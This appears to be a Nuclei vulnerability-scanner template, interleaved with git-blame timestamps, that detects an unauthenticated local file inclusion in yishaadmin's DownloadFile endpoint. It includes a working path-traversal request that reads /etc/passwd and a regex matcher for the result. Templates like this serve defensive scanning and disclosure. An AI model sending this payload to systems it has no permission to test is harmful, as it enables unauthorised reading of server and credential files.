2022-02-15 13:03:24 +00:00
id : yishaadmin-lfi
2022-02-15 04:48:57 +00:00
info :
2022-08-05 13:57:51 +00:00
name : yishaadmin - Local File Inclusion
2022-02-15 04:48:57 +00:00
author : Evan Rubinstein
2022-02-15 13:03:24 +00:00
severity : high
2022-08-05 13:57:51 +00:00
description : yishaadmin is vulnerable to local file inclusion via the "/admin/File/DownloadFile" endpoint and allows files to be downloaded, read or deleted without any authentication.
2022-02-15 13:03:24 +00:00
reference :
- https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/
- https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : lfi,yishaadmin,huntr
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-02-15 04:48:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-15 04:48:57 +00:00
- raw :
- |
GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : regex
2022-02-15 04:53:28 +00:00
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2022-02-15 13:03:24 +00:00
- type : status
status :
- 200